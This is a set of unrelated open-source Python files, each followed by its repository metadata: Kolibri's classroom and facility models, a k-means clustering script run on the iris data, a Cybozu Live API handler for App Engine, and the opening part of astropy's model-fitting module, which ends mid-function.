super(Facility, self).save(*args, **kwargs)
def infer_dataset(self):
# if we don't yet have a dataset, create a new one for this facility
if not self.dataset_id:
self.dataset = FacilityDataset.objects.create()
return self.dataset
def get_classrooms(self):
"""
Returns a QuerySet of Classrooms under this Facility.
:return: A Classroom QuerySet.
"""
return Classroom.objects.filter(parent=self)
def add_admin(self, user):
return self.add_role(user, role_kinds.ADMIN)
def add_admins(self, users):
return [self.add_admin(user) for user in users]
def remove_admin(self, user):
self.remove_role(user, role_kinds.ADMIN)
def add_coach(self, user):
return self.add_role(user, role_kinds.COACH)
def add_coaches(self, users):
return [self.add_coach(user) for user in users]
def remove_coach(self, user):
self.remove_role(user, role_kinds.COACH)
def __str__(self):
return self.name
@python_2_unicode_compatible
class Classroom(Collection):
_KIND = collection_kinds.CLASSROOM
objects = CollectionProxyManager()
class Meta:
proxy = True
def save(self, *args, **kwargs):
if not self.parent:
raise IntegrityError("Classroom cannot be the root of a collection tree, and must have a parent.")
super(Classroom, self).save(*args, **kwargs)
def get_facility(self):
"""
Gets the ``Classroom``'s parent ``Facility``.
:return: A ``Facility`` instance.
"""
return Facility.objects.get(id=self.parent_id)
def get_learner_groups(self):
"""
Returns a ``QuerySet`` of ``LearnerGroups`` associated with this ``Classroom``.
:return: A ``LearnerGroup`` ``QuerySet``.
"""
return LearnerGroup.objects.filter(parent=self)
def add_admin(self, user):
return self.add_role(user, role_kinds.ADMIN)
def add_admins(self, users):
return [self.add_admin(user) for user in users]
def remove_admin(self, user):
self.remove_role(user, role_kinds.ADMIN)
def add_coach(self, user):
return self.add_role(user, role_kinds.COACH)
def add_coaches(self, users):
return [self.add_coach(user) for user in users]
def remove_coach(self, user):
self.remove_role(user, role_kinds.COACH)
def __str__(self):
return self.name
@python_2_unicode_compatible
class LearnerGroup(Collection):
_KIND = collection_kinds.LEARNERGROUP
objects = CollectionProxyManager()
class Meta:
proxy = True
def save(self, *args, **kwargs):
if not self.parent:
raise IntegrityError("LearnerGroup cannot be the root of a collection tree, and must have a parent.")
super(LearnerGroup, self).save(*args, **kwargs)
def get_classroom(self):
"""
Gets the ``LearnerGroup``'s parent ``Classroom``.
:return: A ``Classroom`` instance.
"""
return Classroom.objects.get(id=self.parent_id)
def add_learner(self, user):
return self.add_member(user)
def add_learners(self, users):
return [self.add_learner(user) for user in users]
def remove_learner(self, user):
return self.remove_member(user)
def __str__(self):
return self.name
| {
"content_hash": "f5f78ba31e5be31579193fb046e415d8",
"timestamp": "",
"source": "github",
"line_count": 979,
"max_line_length": 144,
"avg_line_length": 42.97037793667007,
"alnum_prop": 0.6726490444042978,
"repo_name": "aronasorman/kolibri",
"id": "d4d04dde8cbbe3d7106a947c6b4b9fdbfe30f735",
"size": "42068",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "kolibri/auth/models.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "26247"
},
{
"name": "HTML",
"bytes": "4007"
},
{
"name": "JavaScript",
"bytes": "330241"
},
{
"name": "Makefile",
"bytes": "3887"
},
{
"name": "Python",
"bytes": "569360"
},
{
"name": "Shell",
"bytes": "7127"
},
{
"name": "Vue",
"bytes": "222681"
}
],
"symlink_target": ""
} |
import sys
import numpy as np
import operator
import random
from scipy.spatial import distance
from sklearn.cross_validation import train_test_split
from sklearn.datasets import load_iris
def normalise(dataset):
maxes = np.max(dataset, axis=0)
mins = np.min(dataset, axis=0)
ranges = maxes - mins
return (dataset - mins) / ranges
def random_group_assignment(points, k):
return np.random.random_integers(0, k - 1, points)
def mean_centre(points):
return np.mean(points, axis=0)
def dist(a, b):
return distance.euclidean(a, b)
def closest_centrepoint(point, centres):
centres_to_dists = [(n, dist(c, point)) for n, c in enumerate(centres)]
return sorted(centres_to_dists, key=operator.itemgetter(1))[0][0]
def most_similar(xs, ys):
min_mismatch = sys.maxint
for x in xs:
for y in ys:
mismatch = len(x - y) + len(y - x)
if mismatch < min_mismatch:
min_mismatch = mismatch
min_pair = (x, y, mismatch)
return min_pair
def accuracy(expected, result):
expected_ag = {}
result_ag = {}
for n, e in enumerate(expected):
expected_ag.setdefault(e, set()).add(n)
for n, r in enumerate(result):
result_ag.setdefault(r, set()).add(n)
expected_sets = expected_ag.values()
result_sets = result_ag.values()
mismatches = 0
while(expected_sets):
e, r, m = most_similar(expected_sets, result_sets)
mismatches += m
expected_sets.remove(e)
result_sets.remove(r)
return mismatches
def main():
K = len(load_iris()['target_names'])
y = load_iris()['target']
X = load_iris()['data']
X = normalise(X)
assignment = random_group_assignment(len(X), K)
for attempt in range(20):
centres = [mean_centre(X[assignment == k]) for k in range(K)]
new_assignment = np.apply_along_axis(closest_centrepoint, 1, X, centres)
corrections = sum(assignment != new_assignment)
print 'Corrections:', corrections
if corrections == 0:
print 'Optimal clusters identified'
break
assignment = new_assignment
print 'Mismatches:', accuracy(y, assignment)
if __name__ == '__main__':
main()
| {
"content_hash": "d8e082b5c741b917abd60f0f87636a9f",
"timestamp": "",
"source": "github",
"line_count": 89,
"max_line_length": 80,
"avg_line_length": 25.382022471910112,
"alnum_prop": 0.621071270473661,
"repo_name": "noelevans/sandpit",
"id": "31c9eea01f249511ea880fca1bd98f20a23d1539",
"size": "2259",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "k_means_clustering.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "7565"
},
{
"name": "HTML",
"bytes": "4003856"
},
{
"name": "Julia",
"bytes": "2285"
},
{
"name": "Jupyter Notebook",
"bytes": "257479"
},
{
"name": "OpenEdge ABL",
"bytes": "1071"
},
{
"name": "Perl",
"bytes": "1003"
},
{
"name": "Python",
"bytes": "383797"
},
{
"name": "R",
"bytes": "16913"
},
{
"name": "Shell",
"bytes": "11957"
},
{
"name": "TypeScript",
"bytes": "112"
},
{
"name": "Vim script",
"bytes": "5639"
}
],
"symlink_target": ""
} |
import os
import urllib
import logging
import datetime
import re
from lib import feedparser
from xml.sax import saxutils
from google.appengine.ext import webapp
from controller.utils import template
from google.appengine.ext.webapp import util
from google.appengine.ext import db
from django.utils import simplejson
from controller import oauth,utils,model
from controller.utils import BaseHandler,need_login
class CybozuliveHandler(BaseHandler):
@need_login
def get(self, action="", account="", param=""):
account = urllib.unquote_plus(account)
param = urllib.unquote_plus(param)
if action == "add_column":
template_values = self.add_column()
tmpl = os.path.join(os.path.dirname(__file__), "../view/cybozulive_add_column.html")
return self.response.out.write(template.render(tmpl, template_values))
if action == "accounts":
template_values = self.accounts()
tmpl = os.path.join(os.path.dirname(__file__), "../view/cybozulive_accounts.html")
return self.response.out.write(template.render(tmpl, template_values))
if action == "messages":
type = self.request.get("type")
if type == "":
url = "https://api.cybozulive.com/api/notification/V2"
template_values = self.get_messages(account, url)
self.response.headers["Content-Type"] = "application/json"
return self.response.out.write(simplejson.dumps(template_values))
if type.startswith("board/"):
url = "https://api.cybozulive.com/api/board/V2?group="+type.split("/")[1]
template_values = self.get_messages(account, url)
self.response.headers["Content-Type"] = "application/json"
return self.response.out.write(simplejson.dumps(template_values))
else:
url = "https://api.cybozulive.com/api/notification/V2?category="+type
template_values = self.get_messages(account, url)
template_values["room_id"] = type
self.response.headers["Content-Type"] = "application/json"
return self.response.out.write(simplejson.dumps(template_values))
self.error(400)
@need_login
def post(self, action="", account="", param=""):
user = self.session.get_user()
account = urllib.unquote_plus(account)
param = urllib.unquote_plus(param)
if action == "post":
message = self.request.get("message")
parent_id = self.request.get("reply-to")
url = "https://api.cybozulive.com/api/board/V2"
xml = '<?xml version="1.0" encoding="UTF-8"?>'
xml += '<feed xmlns="http://www.w3.org/2005/Atom" xmlns:cbl="http://schemas.cybozulive.com/common/2010">'
if parent_id:
xml += "<id>%s</id>" % parent_id
xml += '<entry>'
xml += "<summary type=\"text\">%s</summary>" % saxutils.escape(message)
xml += "</entry>"
url = "https://api.cybozulive.com/api/comment/V2"
else:
title = message[0:15]+"..." if len(message) > 15 else message
xml += '<entry>'
xml += "<cbl:group id=%s />" % saxutils.quoteattr(param)
xml += "<title>%s</title>" % saxutils.escape(title)
xml += "<summary type=\"text\">%s</summary>" % saxutils.escape(message)
xml += "</entry>"
xml += "</feed>"
response, content = oauth.CybozuliveHandler.requestBody(
user,
account,
url,
body=xml.encode('utf-8'))
status = int(response["status"])
if status < 200 and status >= 300:
raise Exception(response["status"] + " failed to post message. : " + content)
self.response.out.write("Message is posted.")
return
self.error(400)
def add_column(self):
user = self.session.get_user()
accounts = oauth.Account.gql(
"WHERE service = :1 and user_ref = :2 and access_token != :3",
"cybozulive", user.key(), None)
if accounts.count() == 0:
return {}
template_values = {
'accounts': accounts
}
return template_values
def accounts(self):
user = self.session.get_user()
accounts = oauth.Account.gql(
"WHERE service = :1 and user_ref = :2 and access_token != :3",
"cybozulive",
user.key(),
None)
if accounts.count() == 0:
return {}
template_values = {
'accounts': accounts
}
return template_values
def get_messages(self, account, url):
user = self.session.get_user()
response, content = oauth.CybozuliveHandler.request(user, account, url)
if response["status"] != "200":
raise Exception(response["status"] + " failed to get messages. : " + url)
result = feedparser.parse(content)
messages = []
for entry in result.entries:
messages.append({
"id": entry.id,
"title": entry.title,
"link": entry.link,
"author": entry.author,
"summary": re.sub("\n", '<br/>', utils.escape_html(entry.summary)) if hasattr(entry, "summary") else "",
"updated": datetime.datetime(*entry.updated_parsed[:6]).strftime("%a %b %d %H:%M:%S %Y")
})
template_values = {
'service': 'cybozulive',
"title": result.feed.title,
"link": result.feed.link,
"feed_url": url,
'messages': messages
}
return template_values
"""
private
category_dict = {
"MYPAGE":"マイページ",
"GROUP":"グループ",
"MP_SCHEDULE":"マイスケジュール",
"G_SCHEDULE":"グループイベント",
"MESSAGE":"メッセージ",
"TASK":"ToDoリスト",
"BOARD":"掲示板",
"CABINET":"共有フォルダ",
"MEMBER_LIST":"グループへの入退会"
}
def convert_category(category):
result = ""
category[0]
"""
def get_profiles(accounts):
profiles = []
max_results = 100
for account in accounts:
if account.service != "cybozulive" or account.access_token == None:
continue
# TODO 必ずプロフィール情報を更新するのはやめたい
start_index = 0
while True:
response, content = oauth.CybozuliveHandler.request_with_account(account, "https://api.cybozulive.com/api/group/V2?max-results=%s&start-index=%s" % (str(max_results), str(start_index)))
account.account_info = unicode(content,'utf-8')
account.put()
account_info = feedparser.parse(account.account_info)
for group in account_info.entries:
profiles.append({
"service":"cybozulive",
"account_name":account.account_name,
"url":"cybozulive/post/"+account.account_name+"/"+group.id.split(",")[1],
"name":group.title+"/"+account.account_name
})
if len(account_info.entries) < max_results:
break
start_index += max_results
return profiles | {
"content_hash": "4429d1609a7e3093ac2e7731fbaa5c5f",
"timestamp": "",
"source": "github",
"line_count": 181,
"max_line_length": 197,
"avg_line_length": 41.85635359116022,
"alnum_prop": 0.53629883843717,
"repo_name": "co-meeting/crowy",
"id": "a05a7286bd479c8f3e855534c71132fe626c0f57",
"size": "7778",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/controller/cybozulive.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "JavaScript",
"bytes": "657626"
},
{
"name": "Python",
"bytes": "404210"
},
{
"name": "Ruby",
"bytes": "3890"
},
{
"name": "Shell",
"bytes": "1803"
}
],
"symlink_target": ""
} |
"""
This module implements classes (called Fitters) which combine optimization
algorithms (typically from `scipy.optimize`) with statistic functions to perform
fitting. Fitters are implemented as callable classes. In addition to the data
to fit, the ``__call__`` method takes an instance of
`~astropy.modeling.core.FittableModel` as input, and returns a copy of the
model with its parameters determined by the optimizer.
Optimization algorithms, called "optimizers" are implemented in
`~astropy.modeling.optimizers` and statistic functions are in
`~astropy.modeling.statistic`. The goal is to provide an easy to extend
framework and allow users to easily create new fitters by combining statistics
with optimizers.
There are two exceptions to the above scheme.
`~astropy.modeling.fitting.LinearLSQFitter` uses Numpy's `~numpy.linalg.lstsq`
function. `~astropy.modeling.fitting.LevMarLSQFitter` uses
`~scipy.optimize.leastsq` which combines optimization and statistic in one
implementation.
"""
# pylint: disable=invalid-name
import abc
import inspect
import operator
import warnings
try:
from importlib.metadata import entry_points
except ImportError:
from importlib_metadata import entry_points
from functools import reduce, wraps
import numpy as np
from astropy.units import Quantity
from astropy.utils.exceptions import AstropyUserWarning
from .utils import poly_map_domain, _combine_equivalency_dict
from .optimizers import (SLSQP, Simplex)
from .statistic import (leastsquare)
from .optimizers import (DEFAULT_MAXITER, DEFAULT_EPS, DEFAULT_ACC)
__all__ = ['LinearLSQFitter', 'LevMarLSQFitter', 'FittingWithOutlierRemoval',
'SLSQPLSQFitter', 'SimplexLSQFitter', 'JointFitter', 'Fitter',
"ModelLinearityError", "ModelsError"]
# Statistic functions implemented in `astropy.modeling.statistic.py
STATISTICS = [leastsquare]
# Optimizers implemented in `astropy.modeling.optimizers.py
OPTIMIZERS = [Simplex, SLSQP]
class Covariance():
"""Class for covariance matrix calculated by fitter. """
def __init__(self, cov_matrix, param_names):
self.cov_matrix = cov_matrix
self.param_names = param_names
def pprint(self, max_lines, round_val):
# Print and label lower triangle of covariance matrix
# Print rows for params up to `max_lines`, round floats to 'round_val'
longest_name = max([len(x) for x in self.param_names])
ret_str = 'parameter variances / covariances \n'
fstring = f'{"": <{longest_name}}| {{0}}\n'
for i, row in enumerate(self.cov_matrix):
if i <= max_lines-1:
param = self.param_names[i]
ret_str += fstring.replace(' '*len(param), param, 1).\
format(repr(np.round(row[:i+1], round_val))[7:-2])
else:
ret_str += '...'
return(ret_str.rstrip())
def __repr__(self):
return(self.pprint(max_lines=10, round_val=3))
def __getitem__(self, params):
# index covariance matrix by parameter names or indices
if len(params) != 2:
raise ValueError('Covariance must be indexed by two values.')
if all(isinstance(item, str) for item in params):
i1, i2 = self.param_names.index(params[0]), self.param_names.index(params[1])
elif all(isinstance(item, int) for item in params):
i1, i2 = params
else:
raise TypeError('Covariance can be indexed by two parameter names or integer indices.')
return(self.cov_matrix[i1][i2])
class StandardDeviations():
""" Class for fitting uncertainties."""
def __init__(self, cov_matrix, param_names):
self.param_names = param_names
self.stds = self._calc_stds(cov_matrix)
def _calc_stds(self, cov_matrix):
# sometimes scipy lstsq returns a non-sensical negative vals in the
# diagonals of the cov_x it computes.
stds = [np.sqrt(x) if x > 0 else None for x in np.diag(cov_matrix)]
return stds
def pprint(self, max_lines, round_val):
longest_name = max([len(x) for x in self.param_names])
ret_str = 'standard deviations\n'
fstring = '{0}{1}| {2}\n'
for i, std in enumerate(self.stds):
if i <= max_lines-1:
param = self.param_names[i]
ret_str += fstring.format(param,
' ' * (longest_name - len(param)),
str(np.round(std, round_val)))
else:
ret_str += '...'
return(ret_str.rstrip())
def __repr__(self):
return(self.pprint(max_lines=10, round_val=3))
def __getitem__(self, param):
if isinstance(param, str):
i = self.param_names.index(param)
elif isinstance(param, int):
i = param
else:
raise TypeError('Standard deviation can be indexed by parameter name or integer.')
return(self.stds[i])
class ModelsError(Exception):
"""Base class for model exceptions"""
class ModelLinearityError(ModelsError):
""" Raised when a non-linear model is passed to a linear fitter."""
class UnsupportedConstraintError(ModelsError, ValueError):
"""
Raised when a fitter does not support a type of constraint.
"""
class _FitterMeta(abc.ABCMeta):
"""
Currently just provides a registry for all Fitter classes.
"""
registry = set()
def __new__(mcls, name, bases, members):
cls = super().__new__(mcls, name, bases, members)
if not inspect.isabstract(cls) and not name.startswith('_'):
mcls.registry.add(cls)
return cls
def fitter_unit_support(func):
"""
This is a decorator that can be used to add support for dealing with
quantities to any __call__ method on a fitter which may not support
quantities itself. This is done by temporarily removing units from all
parameters then adding them back once the fitting has completed.
"""
@wraps(func)
def wrapper(self, model, x, y, z=None, **kwargs):
equivalencies = kwargs.pop('equivalencies', None)
data_has_units = (isinstance(x, Quantity) or
isinstance(y, Quantity) or
isinstance(z, Quantity))
model_has_units = model._has_units
if data_has_units or model_has_units:
if model._supports_unit_fitting:
# We now combine any instance-level input equivalencies with user
# specified ones at call-time.
input_units_equivalencies = _combine_equivalency_dict(
model.inputs, equivalencies, model.input_units_equivalencies)
# If input_units is defined, we transform the input data into those
# expected by the model. We hard-code the input names 'x', and 'y'
# here since FittableModel instances have input names ('x',) or
# ('x', 'y')
if model.input_units is not None:
if isinstance(x, Quantity):
x = x.to(model.input_units[model.inputs[0]],
equivalencies=input_units_equivalencies[model.inputs[0]])
if isinstance(y, Quantity) and z is not None:
y = y.to(model.input_units[model.inputs[1]],
equivalencies=input_units_equivalencies[model.inputs[1]])
# Create a dictionary mapping the real model inputs and outputs
# names to the data. This remapping of names must be done here, after
# the input data is converted to the correct units.
rename_data = {model.inputs[0]: x}
if z is not None:
rename_data[model.outputs[0]] = z
rename_data[model.inputs[1]] = y
else:
rename_data[model.outputs[0]] = y
rename_data['z'] = None
# We now strip away the units from the parameters, taking care to
# first convert any parameters to the units that correspond to the
# input units (to make sure that initial guesses on the parameters)
# are in the right unit system
model = model.without_units_for_data(**rename_data)
# We strip away the units from the input itself
add_back_units = False
if isinstance(x, Quantity):
add_back_units = True
xdata = x.value
else:
xdata = np.asarray(x)
if isinstance(y, Quantity):
add_back_units = True
ydata = y.value
else:
ydata = np.asarray(y)
if z is not None:
if isinstance(z, Quantity):
add_back_units = True
zdata = z.value
else:
zdata = np.asarray(z)
# We run the fitting
if z is None:
model_new = func(self, model, xdata, ydata, **kwargs)
else:
model_new = func(self, model, xdata, ydata, zdata, **kwargs)
# And finally we add back units to the parameters
if add_back_units:
model_new = model_new.with_units_from_data(**rename_data)
return model_new
else:
raise NotImplementedError("This model does not support being "
"fit to data with units.")
else:
return func(self, model, x, y, z=z, **kwargs)
return wrapper
class Fitter(metaclass=_FitterMeta):
"""
Base class for all fitters.
Parameters
----------
optimizer : callable
A callable implementing an optimization algorithm
statistic : callable
Statistic function
"""
supported_constraints = []
def __init__(self, optimizer, statistic):
if optimizer is None:
raise ValueError("Expected an optimizer.")
if statistic is None:
raise ValueError("Expected a statistic function.")
if inspect.isclass(optimizer):
# a callable class
self._opt_method = optimizer()
elif inspect.isfunction(optimizer):
self._opt_method = optimizer
else:
raise ValueError("Expected optimizer to be a callable class or a function.")
if inspect.isclass(statistic):
self._stat_method = statistic()
else:
self._stat_method = statistic
def objective_function(self, fps, *args):
"""
Function to minimize.
Parameters
----------
fps : list
parameters returned by the fitter
args : list
[model, [other_args], [input coordinates]]
other_args may include weights or any other quantities specific for
a statistic
Notes
-----
The list of arguments (args) is set in the `__call__` method.
Fitters may overwrite this method, e.g. when statistic functions
require other arguments.
"""
model = args[0]
meas = args[-1]
_fitter_to_model_params(model, fps)
res = self._stat_method(meas, model, *args[1:-1])
return res
@staticmethod
def _add_fitting_uncertainties(*args):
"""
When available, calculate and sets the parameter covariance matrix
(model.cov_matrix) and standard deviations (model.stds).
"""
return None
@abc.abstractmethod
def __call__(self):
"""
This method performs the actual fitting and modifies the parameter list
of a model.
Fitter subclasses should implement this method.
"""
raise NotImplementedError("Subclasses should implement this method.")
# TODO: I have ongoing branch elsewhere that's refactoring this module so that
# all the fitter classes in here are Fitter subclasses. In the meantime we
# need to specify that _FitterMeta is its metaclass.
class LinearLSQFitter(metaclass=_FitterMeta):
"""
A class performing a linear least square fitting.
Uses `numpy.linalg.lstsq` to do the fitting.
Given a model and data, fits the model to the data and changes the
model's parameters. Keeps a dictionary of auxiliary fitting information.
Notes
-----
Note that currently LinearLSQFitter does not support compound models.
"""
supported_constraints = ['fixed']
supports_masked_input = True
def __init__(self, calc_uncertainties=False):
self.fit_info = {'residuals': None,
'rank': None,
'singular_values': None,
'params': None
}
self._calc_uncertainties=calc_uncertainties
@staticmethod
def _is_invertible(m):
"""Check if inverse of matrix can be obtained."""
if m.shape[0] != m.shape[1]:
return False
if np.linalg.matrix_rank(m) < m.shape[0]:
return False
return True
def _add_fitting_uncertainties(self, model, a, n_coeff, x, y, z=None,
resids=None):
"""
Calculate and parameter covariance matrix and standard deviations
and set `cov_matrix` and `stds` attributes.
"""
x_dot_x_prime = np.dot(a.T, a)
masked = False or hasattr(y, 'mask')
# check if invertible. if not, can't calc covariance.
if not self._is_invertible(x_dot_x_prime):
return(model)
inv_x_dot_x_prime = np.linalg.inv(x_dot_x_prime)
if z is None: # 1D models
if len(model) == 1: # single model
mask = None
if masked:
mask = y.mask
xx = np.ma.array(x, mask=mask)
RSS = [(1/(xx.count()-n_coeff)) * resids]
if len(model) > 1: # model sets
RSS = [] # collect sum residuals squared for each model in set
for j in range(len(model)):
mask = None
if masked:
mask = y.mask[..., j].flatten()
xx = np.ma.array(x, mask=mask)
eval_y = model(xx, model_set_axis=False)
eval_y = np.rollaxis(eval_y, model.model_set_axis)[j]
RSS.append((1/(xx.count()-n_coeff)) * np.sum((y[..., j] - eval_y)**2))
else: # 2D model
if len(model) == 1:
mask = None
if masked:
warnings.warn('Calculation of fitting uncertainties '
'for 2D models with masked values not '
'currently supported.\n',
AstropyUserWarning)
return
xx, yy = np.ma.array(x, mask=mask), np.ma.array(y, mask=mask)
# len(xx) instead of xx.count. this will break if values are masked?
RSS = [(1/(len(xx)-n_coeff)) * resids]
else:
RSS = []
for j in range(len(model)):
eval_z = model(x, y, model_set_axis=False)
mask = None # need to figure out how to deal w/ masking here.
if model.model_set_axis == 1:
# model_set_axis passed when evaluating only refers to input shapes
# so output must be reshaped for model_set_axis=1.
eval_z = np.rollaxis(eval_z, 1)
eval_z = eval_z[j]
RSS.append([(1/(len(x)-n_coeff)) * np.sum((z[j] - eval_z)**2)])
covs = [inv_x_dot_x_prime * r for r in RSS]
free_param_names = [x for x in model.fixed if (model.fixed[x] is False)
and (model.tied[x] is False)]
if len(covs) == 1:
model.cov_matrix = Covariance(covs[0], model.param_names)
model.stds = StandardDeviations(covs[0], free_param_names)
else:
model.cov_matrix = [Covariance(cov, model.param_names) for cov in covs]
model.stds = [StandardDeviations(cov, free_param_names) for cov in covs]
@staticmethod
def _deriv_with_constraints(model, param_indices, x=None, y=None):
if y is None:
d = np.array(model.fit_deriv(x, *model.parameters))
else:
d = np.array(model.fit_deriv(x, y, *model.parameters))
if model.col_fit_deriv:
return d[param_indices]
else:
return d[..., param_indices]
def _map_domain_window(self, model, x, y=None):
"""
Maps domain into window for a polynomial model which has these
attributes.
"""
if y is None:
if hasattr(model, 'domain') and model.domain is None:
model.domain = [x.min(), x.max()]
if hasattr(model, 'window') and model.window is None:
model.window = [-1, 1]
return poly_map_domain(x, model.domain, model.window)
else:
if hasattr(model, 'x_domain') and model.x_domain is None:
model.x_domain = [x.min(), x.max()]
if hasattr(model, 'y_domain') and model.y_domain is None:
model.y_domain = [y.min(), y.max()]
if hasattr(model, 'x_window') and model.x_window is None:
model.x_window = [-1., 1.]
if hasattr(model, 'y_window') and model.y_window is None:
model.y_window = [-1., 1.]
xnew = poly_map_domain(x, model.x_domain, model.x_window)
ynew = poly_map_domain(y, model.y_domain, model.y_window)
return xnew, ynew
@fitter_unit_support
def __call__(self, model, x, y, z=None, weights=None, rcond=None):
"""
Fit data to this model.
Parameters
----------
model : `~astropy.modeling.FittableModel`
model to fit to x, y, z
x : array
Input coordinates
y : array-like
Input coordinates
z : array-like, optional
Input coordinates.
If the dependent (``y`` or ``z``) co-ordinate values are provided
as a `numpy.ma.MaskedArray`, any masked points are ignored when
fitting. Note that model set fitting is significantly slower when
there are masked points (not just an empty mask), as the matrix
equation has to be solved for each model separately when their
co-ordinate grids differ.
weights : array, optional
Weights for fitting.
For data with Gaussian uncertainties, the weights should be
1/sigma.
rcond : float, optional
Cut-off ratio for small singular values of ``a``.
Singular values are set to zero if they are smaller than ``rcond``
times the largest singular value of ``a``.
equivalencies : list or None, optional, keyword-only
List of *additional* equivalencies that are should be applied in
case x, y and/or z have units. Default is None.
Returns
-------
model_copy : `~astropy.modeling.FittableModel`
a copy of the input model with parameters set by the fitter
"""
if not model.fittable:
raise ValueError("Model must be a subclass of FittableModel")
if not model.linear:
raise ModelLinearityError('Model is not linear in parameters, '
'linear fit methods should not be used.')
if hasattr(model, "submodel_names"):
raise ValueError("Model must be simple, not compound")
_validate_constraints(self.supported_constraints, model)
model_copy = model.copy()
model_copy.sync_constraints = False
_, fitparam_indices = _model_to_fit_params(model_copy)
if model_copy.n_inputs == 2 and z is None:
raise ValueError("Expected x, y and z for a 2 dimensional model.")
farg = _convert_input(x, y, z, n_models=len(model_copy),
model_set_axis=model_copy.model_set_axis)
has_fixed = any(model_copy.fixed.values())
# This is also done by _convert_inputs, but we need it here to allow
# checking the array dimensionality before that gets called:
if weights is not None:
weights = np.asarray(weights, dtype=float)
if has_fixed:
# The list of fixed params is the complement of those being fitted:
fixparam_indices = [idx for idx in
range(len(model_copy.param_names))
if idx not in fitparam_indices]
# Construct matrix of user-fixed parameters that can be dotted with
# the corresponding fit_deriv() terms, to evaluate corrections to
# the dependent variable in order to fit only the remaining terms:
fixparams = np.asarray([getattr(model_copy,
model_copy.param_names[idx]).value
for idx in fixparam_indices])
if len(farg) == 2:
x, y = farg
if weights is not None:
# If we have separate weights for each model, apply the same
# conversion as for the data, otherwise check common weights
# as if for a single model:
_, weights = _convert_input(
x, weights,
n_models=len(model_copy) if weights.ndim == y.ndim else 1,
model_set_axis=model_copy.model_set_axis
)
# map domain into window
if hasattr(model_copy, 'domain'):
x = self._map_domain_window(model_copy, x)
if has_fixed:
lhs = np.asarray(self._deriv_with_constraints(model_copy,
fitparam_indices,
x=x))
fixderivs = self._deriv_with_constraints(model_copy, fixparam_indices, x=x)
else:
lhs = np.asarray(model_copy.fit_deriv(x, *model_copy.parameters))
sum_of_implicit_terms = model_copy.sum_of_implicit_terms(x)
rhs = y
else:
x, y, z = farg
if weights is not None:
# If we have separate weights for each model, apply the same
# conversion as for the data, otherwise check common weights
# as if for a single model:
_, _, weights = _convert_input(
x, y, weights,
n_models=len(model_copy) if weights.ndim == z.ndim else 1,
model_set_axis=model_copy.model_set_axis
)
# map domain into window
if hasattr(model_copy, 'x_domain'):
x, y = self._map_domain_window(model_copy, x, y)
if has_fixed:
lhs = np.asarray(self._deriv_with_constraints(model_copy,
fitparam_indices, x=x, y=y))
fixderivs = self._deriv_with_constraints(model_copy,
fixparam_indices,
x=x, y=y)
else:
lhs = np.asanyarray(model_copy.fit_deriv(x, y, *model_copy.parameters))
sum_of_implicit_terms = model_copy.sum_of_implicit_terms(x, y)
if len(model_copy) > 1:
# Just to be explicit (rather than baking in False == 0):
model_axis = model_copy.model_set_axis or 0
if z.ndim > 2:
# For higher-dimensional z, flatten all the axes except the
# dimension along which models are stacked and transpose so
# the model axis is *last* (I think this resolves Erik's
# pending generalization from 80a6f25a):
rhs = np.rollaxis(z, model_axis, z.ndim)
rhs = rhs.reshape(-1, rhs.shape[-1])
else:
# This "else" seems to handle the corner case where the
# user has already flattened x/y before attempting a 2D fit
# but z has a second axis for the model set. NB. This is
# ~5-10x faster than using rollaxis.
rhs = z.T if model_axis == 0 else z
if weights is not None:
# Same for weights
if weights.ndim > 2:
# Separate 2D weights for each model:
weights = np.rollaxis(weights, model_axis, weights.ndim)
weights = weights.reshape(-1, weights.shape[-1])
elif weights.ndim == z.ndim:
# Separate, flattened weights for each model:
weights = weights.T if model_axis == 0 else weights
else:
# Common weights for all the models:
weights = weights.flatten()
else:
rhs = z.flatten()
if weights is not None:
weights = weights.flatten()
# If the derivative is defined along rows (as with non-linear models)
if model_copy.col_fit_deriv:
lhs = np.asarray(lhs).T
# Some models (eg. Polynomial1D) don't flatten multi-dimensional inputs
# when constructing their Vandermonde matrix, which can lead to obscure
# failures below. Ultimately, np.linalg.lstsq can't handle >2D matrices,
# so just raise a slightly more informative error when this happens:
if np.asanyarray(lhs).ndim > 2:
raise ValueError('{} gives unsupported >2D derivative matrix for '
'this x/y'.format(type(model_copy).__name__))
# Subtract any terms fixed by the user from (a copy of) the RHS, in
# order to fit the remaining terms correctly:
if has_fixed:
if model_copy.col_fit_deriv:
fixderivs = np.asarray(fixderivs).T # as for lhs above
rhs = rhs - fixderivs.dot(fixparams) # evaluate user-fixed terms
# Subtract any terms implicit in the model from the RHS, which, like
# user-fixed terms, affect the dependent variable but are not fitted:
if sum_of_implicit_terms is not None:
# If we have a model set, the extra axis must be added to
# sum_of_implicit_terms as its innermost dimension, to match the
# dimensionality of rhs after _convert_input "rolls" it as needed
# by np.linalg.lstsq. The vector then gets broadcast to the right
# number of sets (columns). This assumes all the models share the
# same input co-ordinates, as is currently the case.
if len(model_copy) > 1:
sum_of_implicit_terms = sum_of_implicit_terms[..., np.newaxis]
rhs = rhs - sum_of_implicit_terms
if weights is not None:
if rhs.ndim == 2:
if weights.shape == rhs.shape:
# separate weights for multiple models case: broadcast
# lhs to have more dimension (for each model)
lhs = lhs[..., np.newaxis] * weights[:, np.newaxis]
rhs = rhs * weights
else:
lhs *= weights[:, np.newaxis]
# Don't modify in-place in case rhs was the original
# dependent variable array
rhs = rhs * weights[:, np.newaxis]
else:
lhs *= weights[:, np.newaxis]
rhs = rhs * weights
scl = (lhs * lhs).sum(0)
lhs /= scl
masked = np.any(np.ma.getmask(rhs))
if weights is not None and not masked and np.any(np.isnan(lhs)):
raise ValueError('Found NaNs in the coefficient matrix, which '
'should not happen and would crash the lapack '
'routine. Maybe check that weights are not null.')
a = None # need for calculating covarience
if ((masked and len(model_copy) > 1) or
(weights is not None and weights.ndim > 1)):
# Separate masks or weights for multiple models case: Numpy's
# lstsq supports multiple dimensions only for rhs, so we need to
# loop manually on the models. This may be fixed in the future
# with https://github.com/numpy/numpy/pull/15777.
# Initialize empty array of coefficients and populate it one model
# at a time. The shape matches the number of coefficients from the
# Vandermonde matrix and the number of models from the RHS:
lacoef = np.zeros(lhs.shape[1:2] + rhs.shape[-1:], dtype=rhs.dtype)
# Arrange the lhs as a stack of 2D matrices that we can iterate
